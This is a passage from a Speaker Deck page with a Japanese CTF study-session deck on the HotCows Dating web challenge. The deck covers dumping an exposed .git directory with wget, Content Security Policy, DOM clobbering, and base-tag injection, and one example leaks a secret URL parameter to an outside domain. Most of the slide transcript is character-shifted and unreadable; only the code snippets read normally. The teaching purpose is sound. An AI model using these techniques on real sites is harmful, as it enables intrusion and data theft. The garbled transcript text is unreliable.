Upgrade to Pro — share decks privately, control downloads, hide ads and more …

katagaitai勉強会#6 EasyなWeb編 / katagaitaiCTF#6 Web

Yu Yagihashi
August 13, 2016
Technology
1
1.2k

katagaitai勉強会#6 EasyなWeb編 / katagaitaiCTF#6 Web

katagaitai勉強会#6 Web編のスライドです。

Yu Yagihashi

August 13, 2016
Tweet

More Decks by Yu Yagihashi

See All by Yu Yagihashi
A Security Engineer in the Web Re-architecture Project
yagihashoo
0
1.1k
The face of X-Content-Type-Options which you may not know
yagihashoo
0
360
A talk about XSS thousand knocks(Shibuya.XSS techtalk#10)
yagihashoo
5
2.8k

Other Decks in Technology

See All in Technology
これまでの計測・開発・デプロイ方法全部見せます! / Findy ISUCON 2024-11-14
tohutohu
3
370
Security-JAWS【第35回】勉強会クラウドにおけるマルウェアやコンテンツ改ざんへの対策
4su_para
0
180
ISUCONに強くなるかもしれない日々の過ごしかた/Findy ISUCON 2024-11-14
fujiwara3
8
880
CysharpのOSS群から見るModern C#の現在地
neuecc
2
3.5k
iOS/Androidで同じUI体験をネ イティブで作成する際に気をつ けたい落とし穴
fumiyasac0921
1
110
Introduction to Works of ML Engineer in LY Corporation
lycorp_recruit_jp
0
140
個人でもIAM Identity Centerを使おう!(アクセス管理編)
ryder472
4
240
OCI 運用監視サービス 概要
oracle4engineer
PRO
0
4.8k
エンジニア人生の拡張性を高める 「探索型キャリア設計」の提案
tenshoku_draft
1
130
『Firebase Dynamic Links終了に備える』 FlutterアプリでのAdjust導入とDeeplink最適化
techiro
0
150
アプリエンジニアのためのGraphQL入門.pdf
spycwolf
0
100
AI前提のサービス運用ってなんだろう?
ryuichi1208
8
1.4k

Featured

See All Featured
Adopting Sorbet at Scale
ufuk
73
9.1k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
For a Future-Friendly Web
brad_frost
175
9.4k
We Have a Design System, Now What?
morganepeng
50
7.2k
Done Done
chrislema
181
16k
Statistics for Hackers
jakevdp
796
220k
Embracing the Ebb and Flow
colly
84
4.5k
Ruby is Unlike a Banana
tanoku
97
11k
Optimising Largest Contentful Paint
csswizardry
33
2.9k
How to train your dragon (web standard)
notwaldorf
88
5.7k
Building Flexible Design Systems
yeseniaperezcruz
327
38k
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k

Transcript

  1. LBUBHBJUBJษڧձ
 &BTZͳ8FCฤ 1SFTFOUFECZ!ZBHJIBTIPP

  2. XIPBNJ

  3. )BTIUBHLBUBHBJUBJ$5' XIPBNJ ‣ :V:BHJIBTIJ ‣ IUUQTYTTNPF ‣ 5XJUUFS!ZBHJIBTIPP ‣ 944FS

    ‣ 4FDVSJUZ"TTFTTNFOU ‣ $5'GPS#FHJOOFST

  4. )BTIUBHLBUBHBJUBJ$5' .ZCPPLT

  5. 5BSHFU

  6. )BTIUBHLBUBHBJUBJ$5' 4DPQF ‣ 8IBUEPFTl&BTZzNFBO 
 #FHJOOFS\IFSF^*OUFSNFEJBUF ‣ *IPQFUIJTFWFOUJTUPCFUIFOFYUTUFQGPSUIF CFHJOOFST ‣

    .PSFEFFQMZ NPSFCSPBEMZ NPSFEFUBJMFE UIBOl$5'GPS#FHJOOFSTz

  7. )BTIUBHLBUBHBJUBJ$5' .JTTJPO ‣ )PU$PXT%BUJOH )BDLMV$5'  ‣ -FU`TMFBSOUIF944XJUIPVUTDSJQUJOH ‣ 5IFSFBSFUXPXBZTUPTPMWF

    ‣ 8IBU`T%0.$MPCCFSJOH  ‣ 8IBU`T$POUFOU4FDVSJUZ1PMJDZ  ‣ $PPMPOF(PMEFOqBHBXBSEQSJ[FEBTUIFNPTU VOFYQFDUFETPMVUJPO

  8. 3FDPOOBJTTBODF

  9. )BTIUBHLBUBHBJUBJ$5' 'JSTUPGBMM ‣ -FU`TBDDFTTUPUIFUBSHFUXFCTJUF ‣ IUUQTHPPHMR/K.G% ‣ #FDBVTFPGTPNFUFDIOJDBMSFBTPOT ZPVIBECFUUFS BDDFTTXJUI$ISPNF

    PS$ISPNFCBTFECSPXTFS  ‣ *OUIJTMFDUVSF *VTF(PPHMF$ISPNFGPSFYBNQMF

  10. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ $SFBUFBOBDDPVOUBOEMPHJO

  11. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ 6TFSTDBODIBUXJUITPNFDPXTʜ

  12. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ 6TFSTDBODIBUXJUITPNFDPXTʜ

  13. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ 4FFNTJNQPTTJCMFUPHFUUIFQSFNJVNBDDPVOU

  14. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ "OPUIFSGFBUVSFGPSUIFSFQPSUJOHQSPCMFN

  15. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ "OPUIFSGFBUVSFGPSUIFSFQPSUJOHQSPCMFN

  16. )BTIUBHLBUBHBJUBJ$5' -FU`TTFFUIFGFBUVSFT ‣ "MMGFBUVSFTPGUIJTTJUF ‣ $PXFS7JFX%JTQMBZTBMMPOMJOFDPXT ‣ $IBUUJOHQBHF$IBUXJUISFTQFDUJWFDPXT ‣ 3FQPSUJOH1BHF5IFGPSNUPSFQPSUQSPCMFNT

    ‣ 5IFO XIBUTIBMMXFEP  ‣ 5IFSFTIPVMECFTPNFWVMOFSBCJMJUJFT ‣ 5IJTTJUFIBTB944 ‣ $BOZPVpOEJUPVU

  17. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ 5IJTTJUFQSPIJCJUTTFOEJOHBSFQPSU DPOTFDVUJWFMZ ‣ 6TFSTDBOTFOEBSFQPSUFWFSZNJOVUFT ‣ 0NJUUJOHEFUBJMT JUDBOCFFWBEFEVTJOH9

    'PSXBSEFE'PSIFBEFS ‣ $POpHVSF#VSQ4VJUFGPSSFXSJUJOHSFRVFTUIFBEFS

  18. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  19. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  20. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  21. )BTIUBHLBUBHBJUBJ$5' 3FQPSUJOH1BHF ‣ 8IFOTFFJOHUIFQBHFUPTFOEBSFQPSUUP BENJO 944FSNVTUUIJOL
 l5IFSFNBZCFTPNF944z ‣ :PVNBZTBZl8IZEJEZPVLOPXUIBU z

    ‣ 5IFSFJTOPSFBTPO 944JTKVTUUIFSF

  22. 8IFSF`TUIFqBH

  23. )BTIUBHLBUBHBJUBJ$5' *OWFTUJHBUJPO ‣ :PVIBWFNJOVUFT ‣ 'JOEXIFSFUIFqBHJT ‣ )JOU5IFTPVSDFDPEFLOPXTFWFSZUIJOH ‣ :PVLOPXNBOZTPMVUJPOTUPHFUUIFTPVSDF

    DPEF3$& 1BUIUSBWFSTBM BOETPPO

  24. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 8IBUZPVIBWFUPEPpSTUMZJTHBUIFS JOGPSNBUJPO ‣ 8IPJTJOGPSNBUJPO %/4SFDPSET )551IFBEFST 

    4ZTUFNFSSPSNFTTBHFT BOETPPO ‣ 4PNFUJNFT IJEEFOQBHFTBSFMJTUFEPO
 lSPCPUTUYUz ‣ *UJTO`UHPPEUPIJEFTPNFUIJOHMJTUJOHPOSPCPUTUYU ‣ SPCPUTUYUJTPQFOUPFWFSZPOFPOUIF*OUFSOFU
 0GDPVSTFJU`TJOUFOEFEUPTIPXUIBUDSBXMFST

  25. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 5IFSFTFFNTCFHJUEJSFDUPSZ

  26. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ *U`TQPTTJCMFUPBDRVJSFBMMTPVSDFDPEFTʜ

  27. )BTIUBHLBUBHBJUBJ$5' )PXUPHFUUIFTPVSDFT ‣ 6TFXHFUUPEPXOMPBEUIFHJUEJSFDUPSZ ‣ "GUFSEPXOMPBEJU VTFHJUBOESFTUPSFUIF TPVSDFDPEFTPOUIFMPDBM wget -r

    --no-check-certificate -erobots=off https://wildwildweb.fluxfingers.net:1401/.git/

  28. )BTIUBHLBUBHBJUBJ$5' )PXUPHFUUIFTPVSDFT ‣ 3VOAHJUTUBUVTABOEDPOpSNUIBUUIF EJSFDUPSJFTQSPQFSMZEPXOMPBEFE

  29. )BTIUBHLBUBHBJUBJ$5' )PXUPHFUUIFTPVSDFT ‣ 3VOAHJUSFTFUŠIBSEABOESFTUPSFGBMMFOPVU pMFT

  30. )BTIUBHLBUBHBJUBJ$5' (FUJOUPUIFTPVSDFDPEFT ‣ "QBSUGSPNBOZUIJOHFMTF MPPLUIF MJTUPGUIFTPVSDFDPEFT ‣ +VTUVTFAMT3APSAUSFFA ‣ 4PNF"1*TDSJQUTBSFJOUIFlBQJz

    EJSFDUPSZ JU`TJOUFSFTUJOH ‣ 5IFSFJTBDPOpHTDSJQUTOBNFEXJUI lDGHQIQz-FU`TCFHJOXJUIUIJT . ├── api │ ├── error.php │ ├── login.php │ ├── logout.php │ ├── premium.php │ ├── register.php │ └── report.php ├── cfg.php ├── css │ └── style.css ├── index.php ├── js │ ├── form.js │ ├── http.js │ ├── loader.js │ ├── pages │ │ ├── chat.js │ │ ├── error.js │ │ ├── index.js │ │ ├── internal.js │ │ ├── logout.js │ │ └── report.js │ ├── router.js │ └── template.js ├── lib │ ├── Template.php │ ├── session.php │ └── util.php ├── robots.txt ├── static │ ├── abbie.jpg │ ├── clara.jpg │ ├── cow_front.jpg │ ├── maggie.jpg │ └── rosie.jpg └── templates ├── cow.html ├── error.html ├── index.html ├── internal.html ├── layout.phtml ├── message.html ├── message.pjson └── report.html

  31. )BTIUBHLBUBHBJUBJ$5' $IFDLUIFDPOpH ‣ 5IFqBHTUSJOHJTEFpOFEBTBDPOTUBOU ‣ 4PXFOFFEUPpOEXIFSFUIJTDPOTUBOUJT DBMMFEJOUIFTPVSDFDPEFT ‣ *U`TTJNQMFUBTL KVTUVTFHSFQ

    ‣ HSFQF'-"(ApOEOBNF QIQA 27 // change this 28 define('FLAG', 'XXX'); 29 define('SALT', 'XXX');

  32. )BTIUBHLBUBHBJUBJ$5' (SFQSFTVMU ‣ 5IFqBHJTVTFEJOQSFNJVNQIQ ‣ 4PHFUJOUPUIJTpMFOFYU

  33. )BTIUBHLBUBHBJUBJ$5' QSFNJVNQIQ ‣ 5IJT"1*JTDBMMFEPOUIFDIBUQBHF ‣ *OUIFMBUFSTUFQ HFUUJOHJOUPUIFDMJFOUTJEF DPEFT

  34. 5JNFUP944

  35. )BTIUBHLBUBHBJUBJ$5' *OWFTUJHBUJPO ‣ 944XJMMCFOFFEFEUPDBQUVSFUIFqBH ‣ #BTJDBMMZ ZPVIBWFUPpOEUIFWVMOFSBCJMJUJFTGSPN TDSBUDIJO$5' ‣ :PVIBWFNJOVUFT

    ‣ 'JOEVTFGVMPOF

  36. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ $PVMEZPVpOEHPPEPOF  ‣ 4PNFUBHTXPSLPOl QDIBUT944 Tz ‣

    )PXFWFS DPVMEZPVSVOlBMFSU b944` zPOUIJT QBHF  ‣ 5IFSF`TTPNFUIJOHTUSBOHFXJUIUIJTTJUF  SJHIU

  37. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 4PNFUBHTMJLFTXPSLTXFMM

  38. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ )PXFWFS TDSJQUEPFTO`UXPSLBUBMM

  39. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 4PNFUIJOHXSPOHʜ

  40. l3FGVTFEUPFYFDVUFJOMJOFFWFOUIBOEMFSCFDBVTFJU WJPMBUFTUIFGPMMPXJOH$POUFOU4FDVSJUZ1PMJDZ EJSFDUJWFTDSJQUTSDTFMG&JUIFSUIFVOTBGFJOMJOF LFZXPSE BIBTI TIB PSBOPODF OPODF JTSFRVJSFEUPFOBCMFJOMJOFFYFDVUJPOz

  41. l3FGVTFEUPFYFDVUFJOMJOFFWFOUIBOEMFSCFDBVTFJU WJPMBUFTUIFGPMMPXJOH$POUFOU4FDVSJUZ1PMJDZ EJSFDUJWFTDSJQUTSDTFMG&JUIFSUIFVOTBGFJOMJOF LFZXPSE BIBTI TIB PSBOPODF OPODF JTSFRVJSFEUPFOBCMFJOMJOFFYFDVUJPOz 8IBU`TUIJT

    

  42. $POUFOU4FDVSJUZ1PMJDZ

  43. )BTIUBHLBUBHBJUBJ$5' 8IBU`TUIF$41 ‣ /FXHFOFSBUJPOXFCTFDVSJUZNFDIBOJTN ‣ #FZPOETUIF4BNF0SJHJO1PMJDZ ‣ &QPDINBLJOHBOUJ944GFBUVSFPOCSPXTFST ‣ 3FTUSJDUTMPBEJOHSFTPVSDFTCBTFEPOXIJUFMJTU

    ‣ 8FCTJUFJOGPSNTTBGFSFTPVSDFXJUIQPMJDZEJSFDUJWF UPCSPXTFST ‣ %JSFDUJWFTXPVMECFXSJUUFOJOUIFGPSNBUMJLF
 \EJSFDUJWFOBNF^\SFTPVSDFPSJHJOT^

  44. )BTIUBHLBUBHBJUBJ$5' .PSFBCPVU$41 ‣ )PXUPVTF ‣ $POUFOU4FDVSJUZ1PMJDZIFBEFS ‣ $POUFOU4FDVSJUZ1PMJDZ3FQPSU0OMZIFBEFS ‣ .BKPSEJSFDUJWFT

    ZPVOFFEUPLOPXGPS$5'  ‣ EFGBVMUTSD ‣ TDSJQUTSD ‣ .BKPSSFTPVSDFT ZPVOFFEUPLOPXGPS$5'  ‣ bTFMG` ‣ bVOTBGFJOMJOF` ‣ bVOTBGFFWBM`

  45. )BTIUBHLBUBHBJUBJ$5' -PPLBHBJO ‣ )PX`TPOUIFTJUF-FU`TMPPLBHBJO

  46. )BTIUBHLBUBHBJUBJ$5' 8IBU$41EJE ‣ -FU`TMPPLBUQPMJDJFT ‣ bTFMG`NFBOTUIFTDSJQUT PSTPNFUIJOHFMTF  PSJHJOBUFEGSPNUIFTBNFPSJHJOBSFQFSNJUUFE ‣

    5IFTFQPMJDJFTDPOUBJOOPbVOTBGFJOMJOF` ‣ 4PCSPXTFSTEPO`UFYFDVUFUIFDPEFTMJLFCFMPX
  *OMJOFTDSJQUT TDSJQUBMFSU bUIJT` TDSJQU 
  &WFOUIBOEMFST JNHTSDYPOFSSPSBMFSU bUIJT`  
  +BWB4DSJQUTDIFNF KBWBTDSJQUBMFSU bUIJT` default-src ‘none'; img-src 'self'; script-src ‘self'; style-src ‘self'; connect-src 'self'

  47. )BTIUBHLBUBHBJUBJ$5' 8IBU$41EJE ‣ 0VS944DPEFJTʜ ‣ 0VS944DPEFJTJOKFDUFEUP)5.-DPOUFYU ‣ 4PXFIBWFUPVTFJOMJOFTDSJQUTUPFYFDVUFBSCJUSBM DPEFTPOUIFQBHF ‣

    )PXFWFSʜ ‣ $41CMPDLTFYFDVUJOHJOMJOFTDSJQUTKVTUMJLF
 lJNHTSDYPOFSSPSBMFSU  z ‣ *IBEBUBMLBCPVU$41 BMTPSFGFSUIBU ‣ IUUQXXXTMJEFTIBSFOFUZBHJIBTIPPDTQGYPT

  48. 4P XIBU`TUIFQMBO

  49. )BTIUBHLBUBHBJUBJ$5' 8IBUDBO*EP ‣ $41FWBTJPOJTPVUPGUIFTDPQFUPEBZ ‣ *U`TUPPEJ⒏DVMUUPEFBMXJUIJOTIPSUUFSN ‣ 5IFQPMJDJFTPOUIJTTJUFIBTOPFWJEFOUqBX ‣ )5.-UBHJOKFDUJPOJTQPTTJCMFFWFOVOEFSUIF

    $41 ‣ 4PNFPSEJOBM)5.-UBHTHJWFVTqBHUPEBZ ‣ 4PUPEBZMFU`TMFBSOOPUPSEJOBM944

  50. )BTIUBHLBUBHBJUBJ$5' )5.-5BH*OKFDUJPO ‣ (FOFSBMMZ JU`TVTFEBTTZOPOZNPG944 ‣ *U`TTJNQMF KVTUJOKFDUTPNF)5.-UBHT ‣ 5PEBZ

    JOUSPEVDJOHUXPPGHPPE)5.-UBH JOKFDUJPOBUUBDLNFUIPET ‣ 6TFUIFNBOEHFUUIFqBH

  51. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script>

    console.log(document.URL); // => http://example.com/~~~ </script> </head> <body> <form name="URL">foo bar</form> <script> console.log(document.URL); // => <form name="URL">foo bar</form> </script> </body> </html> TU%0.$MPCCFSJOH

  52. )BTIUBHLBUBHBJUBJ$5' 8IBU`T%0.$MPCCFSJOH ‣ :PVLOPX%0.JTSFBMMZNFTTFE ‣ /PUPOMZ%0. CVUUIF8FCJTBMMNFTTFEGPSMPOH UJNF ‣ 5IFSFTIPVMECFTPMJECPSEFSCFUXFFOUIF

    )5.-EPDVNFOUBOEUIF+BWB4DSJQUDPEF ‣ "OEJUIBWFUPCFGPSCJEEFOJNQMJDJUBDDFTTUPUIF +BWB4DSJQUXPSMEGSPN)5.-XPSME ‣ )PXFWFS GPSTPNFSFBTPOT JUDBOIBQQFOBOEMFBE TPNFBUUBDLTUPUIFTZTUFN5PEBZMFU`TVTFJU ‣ %0.$MPCCFSJOH5IF4QBOOFS ‣ IUUQXXXUIFTQBOOFSDPVLEPN DMPCCFSJOH

  53. )BTIUBHLBUBHBJUBJ$5' 8IBU`T%0.$MPCCFSJOH ‣ %0.USFFJTDPOTUSVDUFEBVUPNBUJDBMMZBGUFS %0.DPOUFOUMPBEJOH ‣ 8IFO%0.USFFJTDPOTUSVDUFE TPNFGPSNJUFN FMFNFOUTBSFJOUFHSBUFEJOUP%0.USFF NFBOT

    HFOFSBUJOHPCKFDUTJO+BWB4DSJQUXPSME  ‣ *UJTCBTFEPOUIFlOBNFzPSlJEzQSPQFSUZPGUIF FMFNFOUT ‣ 4PUIFFMFNFOUTOBNFEPSBTTJHOFE*%FYJTUTJO +BWB4DSJQUXPSMEGSPNUIFTUBSU

  54. )BTIUBHLBUBHBJUBJ$5' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title>

    </head> <body> <form id="here">foo bar</form> <script> console.log(here.innerHTML); // => foo bar </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> </head> <body> <form name="here">foo bar</form> <script> console.log(document.here.innerHTML); // => foo bar </script> </body> </html> 8IBU`T%0.$MPCCFSJOH ‣ 5IF%0.FMFNFOUTPCKFDUTBSFHFOFSBUFE BVUPNBUJDBMMZ ‣ "OEJUDBOCFBDDFTTFEWJB+BWB4DSJQUDPEF ‣ 8IBUEPFTUIJTNFBO

  55. )BTIUBHLBUBHBJUBJ$5' 8IBU`T%0.$MPCCFSJOH ‣ +VTUMJLFCFMPX PWFSSJEJOHUPUIFEFGBVMU PCKFDUTPDDVSTGPSEPDVNFOU VTJOHUIJT UFDIOJRVF <!DOCTYPE html>

    <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script> console.log(document.URL); // => http://example.com/~~~ </script> </head> <body> <form name="URL">foo bar</form> <script> console.log(document.URL); // => <form name="URL">foo bar</form> </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script> var AAA = "global obj"; console.log(AAA); // => global obj </script> </head> <body> <form id="AAA">foo bar</form> <script> console.log(AAA); // => global obj </script> </body> </html>

  56. )BTIUBHLBUBHBJUBJ$5' 8IBU`T%0.$MPCCFSJOH ‣ 0WFSSJEJOHEPDVNFOU PCKFDUT XFDBODBVTF BOFSSPSJOUFOUJPOBMMZ ‣ :PVNBZUIJOLl*TUIBUBMM z

    ‣ *U`TUSJWJBM IPXFWFSIBTBCJHF⒎FDUGPSUIJT )PU$PXT%BUJOH

  57. <!-- The page is on "http://xss.moe/ base.html" --> <base href=“http://sqli.moe/">

    <a href="foo.html">foo</a> ⇒links to sqli.moe/foo.html <script> location.href=“bar.html" </script> ⇒move to sqli.moe/bar.html OE#BTFUBHJOKFDUJPO

  58. )BTIUBHLBUBHBJUBJ$5' 5IFGFBUVSFPGCBTFUBH ‣ #BTFUBHEFpOFTUIFCBTFVSJGPSUIFSFMBUJWF QBUITJOUIFQBHF ‣ &⒎FDUCPUIUBHTBOEDPEFT ‣ +VTUMJLFCFMPX ‣

    $BOOPUVTFlKBWBTDSJQUz BOETPPO NBZCF  ‣ 4POPUVTFGVMGPS944JUTFMG <!-- The page is on "http://xss.moe/base.html" --> <base href=“http://sqli.moe/"> <a href="foo.html">foo</a> ⇒links to sqli.moe/foo.html <script>location.href="bar.html"</script> ⇒move to sqli.moe/bar.html

  59. )BTIUBHLBUBHBJUBJ$5' 8IBUIBQQFOT ‣ *OGPSNBUJPOMFBLBHF ‣ *GUIFSFRVFTUXJUIVSMQBSBNFUFSPDDVSTPOUIFQBHF UIBUJTJOKFDUFENBMJDJPVTCBTFUBH UIPTFVSM QBSBNFUFSTXJMMCFTFOUUPUIFNBMJDJPVTTFSWFS
 ‣

    *OUIJTFYBNQMF UIFMJOLSFGFSTNBMJDJPVTEPNBJO lYTTNPFz ‣ *OUIFSFTVMU lTPNF@TFDSFU@JOGPzQBSBNFUFSMFBLTPVU UPUIFBOPUIFSTFSWFS ‣ 3FGFSFSTUPP ‣ *OUIFTPNFTJUVBUJPOT IUUQSFGFSFSJOGPXJMMBMTPMFBL <base href=“http://xss.moe/this_is_injected/”> <a href="foo.php?some_secret_info=XXX">link</a>

  60. /PXUIFUJNFUP$5'

  61. )BTIUBHLBUBHBJUBJ$5' #ZUIFXBZ ‣ 944OFFETTPNFTFSWFSUPSFDFJWFUIFEBUB ‣ %PZPVIBWFUIFPOFBTTJHOFEHMPCBM BEESFTT  ‣ *GZPVOPU

    VTFUIFTFTJUFT ‣ 5IBOLT!@//6@
 IUUQSFRVFTUCJO ‣ *NBEFUIJTMBTUOJHIUʜ
 IUUQLBUBHBJUBJTRMJNPF

  62. )BTIUBHLBUBHBJUBJ$5' &YQMPJUBUJPO ‣ 6TFUIF%0.$MPCCFSJOHBOEDBQUVSFUIFqBH ‣ :PVIBWFNJOVUFT

  63. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ 6TFUIFEFWFMPQFSUPPMT ‣ DPNNBOE PQUJPO * ‣ DUSM

    TIJGU * ‣ "MMXFCBDDFTTFTBSFMJTUFEPO/FUXPSLUBC ‣ l BQJQSFNJVNQIQzJTUIFPOFXFKVTUTBX CFGPSFIBOE

  64. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ -FU`TpOEUIFDPEFUPJTTVFUIFSFRVFTUUP QSFNJVNQIQ ‣ 0QFOUIF4PVSDFUBCBOECSPXTF
 KTQBHFTDIBUKT ‣ 'JOEBQISBTFlQSFNJVNQIQz

    ‣ *U`TBUMJOF ‣ *U`TDBMMFEJOQBHFHFU1SFNJVNNFUIPE ‣ 4PUIFOFYUJTUIJTNFUIPE

  65. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ 5IFSFTVMUPGQBHFHFU1SFNJVN JTTUPSFEJO QBHFpSTU.FTTBHFGVODUJPOBUMJOF ‣ "OE JU`TEJWJEFEBOETUPSFEUPBOPUIFS WBSJBCMFTJNNFEJBUFMZ

    ‣ 'JOBMMZqBHJTJOQSFNJVN@JE ‣ 8IBUJTQSFNJVN@JEVTFEGPS  premium = page.getPremium(); has_premium = premium[‘success’]; premium_id = premium[‘message’];

  66. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ 'JOEBQISBTFlQSFNJVN@JEz ‣ *U`TBUMJOF ‣ 5IJTNFTTBHFWBSJBCMFJTVTFEGPS AUFNQBTTJHO NFTTBHF

    bNTH A ‣ 8IBU`TUFNQ  ‣ "OEZPVOPUJDFAWBSALFZXPSEJTOPUVTFBUBMMJOUIJT DPEF message = cow_name + ((has_premium) ? ' (' + premium_id + ')' : ‘');

  67. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ UFNQJTFWFSZXIFSFJOUIJTDPEF ‣ 5IJTJTHMPCBMWBSJBCMF TPBMMGVODUJPOTDBO PWFSSJEFUIJTWBSJBCMF ‣ "OEJUSFNBJOTIBWJOHQSFWJPVTWBMVFCFGPSFPWFSSJEF

    JOFBDINFUIPE ‣ .PSFPWFS UIJTPCKFDUIBTUIFNFUIPEOBNFE lBTTJHOz ‣ *GUIJTlUFNQzWBSJBCMFJTMPDBUJPOPCKFDUʜ

  68. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ EFNP

  69. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ EFNP

  70. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ EFNP

  71. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ EFNP

  72. )BTIUBHLBUBHBJUBJ$5' $IBTFUIFqBH ‣ 5IFqBHJTEJTQMBZFEPOUIFDIBUUJOHQBHFJG UIFVTFSJTQSFNJVNBDDPVOU ‣ QSFNJVNQIQSFUVSOTUIFqBHJGUIFVTFSJTQSFNJVN BDDPVOU ‣ +BWB4DSJQUDPEFTPOUIFDIBUUJOHQBHFEJTQMBZTUIF

    WBMVFQSFNJVNQIQSFUVSOTPOUIFQBHF ‣ 4PVTFUIF944POUIFDIBUUJOHQBHF XFDBOBDRVJSF UIFqBH

  73. )BTIUBHLBUBHBJUBJ$5' 5IJOLBCPVUTDFOBSJP ‣ 5IFSFJT944POUIFDIBUUJOHQBHF ‣ 5IFQBSBNFUFSNFBOTEFTUJOBUJPOJTWVMOFSBCMF ‣ 5IFTJUFIBWFBSFQPSUJOHQBHFBOEUIFBENJO NBZTFFUIFSFQPSUT ‣

    "OEBENJONBZIBWFBDPOWFSTBUJPOXJUIUIF SFQPSUFSVTJOHUIFDIBUUJOHQBHF ‣ 4PBENJOUZQFJOUPUIFSFQPSUFSOBNFUPUIF DIBUUJOHQBHF ‣ *UpSFTPVS944DPEFT

  74. )BTIUBHLBUBHBJUBJ$5' 5IJOLBCPVUTDFOBSJP $PX/BNFTPNFYTTDPEFT %FTDSJQUJPOIPHFIPHFIPHF "%.*/ 944
 ͲʔΜʂ '-"( .Z 4FSWFS

  75. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ 8BUDIUIFlUFNQzWBSJBCMFBOEDPOpSNUIBUJUT WBMVF ‣ 4FUUIFCSFBLQPJOU ‣ $MJDLUIFMJOFOVNCFSBUMJOF
 QBHFDIBU"OTXFSdddd

    ‣ 6TFUIF8BUDIGFBUVSFPOUIFSJHIUTJEF ‣ $MJDLl zTJHO ‣ &OUFSlUFNQz ‣ 3FMPBE

  76. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ 'JSTUMZ lUFNQzWBSJBCMFQPJOUTMPDBUJPOPCKFDU ‣ $POUJOVPVTMZTUFQJOUPUIFOFYUGVODUJPODBMM ‣ *UDIBOHFTGSPNMPDBUJPOPCKFDUJOUP5FNQMBUFPCKFDU JOQBHFWJFXGVODUJPOBUMJOF

    ‣ 5IFOFYUGVODUJPODBMMJTGPSQBHFpSTU.FTTBHF XIJDIIBTDPEFEJTQMBZTUIFqBHPOUIFQBHF ‣ 0GDPVSTFUIFGVODUJPOEPFTO`USFEFpOFTlUFNQz temp = new Template('message.html');

  77. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ %PZPVSFNFNCFSXIBU%0.DMPCCFSJOHDBO EP  ‣ 0WFSSJEFEPDVNFOU BOEDBVTFTPNFFSSPS ‣

    *GUIFDPEFDBMMTEPDVNFOU NFUIPECFGPSF lUFNQzWBSJBCMFJTPWFSSJEEFOUP5FNQMBUF PCKFDUʜ  ‣ *GJUPDDVSTJOQBHFWJFXGVODUJPO UFNQSFNBJOT CFJOHMPDBUJPOPCKFDUJOQBHFpSTU.FTTBHFGVODUJPO ‣ "OEMPDBUJPOBTTJHOXJMMCFDBMMFEXJUIUIFqBH

  78. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EPDVNFOUHFU&MFNFOU#Z*EJTDBMMFEBUMJOF CFGPSFlUFNQzWBSJBCMFJTPWFSSJEEFO ‣ *U`TBXFTPNF XFDBODMPCCFS EPDVNFOUHFU&MFNFOU#Z*EBOEDBVTFFSSPS ‣

    "GUFSFSSPSPDDVST UIFSFTUPGDPEFTJOQBHFWJFX GVODUJPOJTOPUFYFDVUFE ‣ 4LJQQJOHTPNFDPEFT QBHFpSTU.FTTBHFXJMMCF DBMMFE

  79. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ -FU`TQSPWFUIFDPODFQUXPSLTXFMM ‣ 4FUUIFCSFBLQPJOUBUMJOF ‣ "DDFTTUPl QDIBUGPSN OBNFHFU&MFNFOU#Z*EGPSNz

    ‣ 4UFQJOUPOFYUGVODUJPODBMMGSPNUIFCSFBL QPJOU ‣ "OFSSPSPDDVSTBUMJOF ‣ 5PSFTVNFTDSJQUFYFDVUJPO ZPVBSFBU
 lGPSNOBNFHFU&MFNFOU#Z*EGPSNzBUUIFFOE btn_logout = document.getElementById('btn-logout');

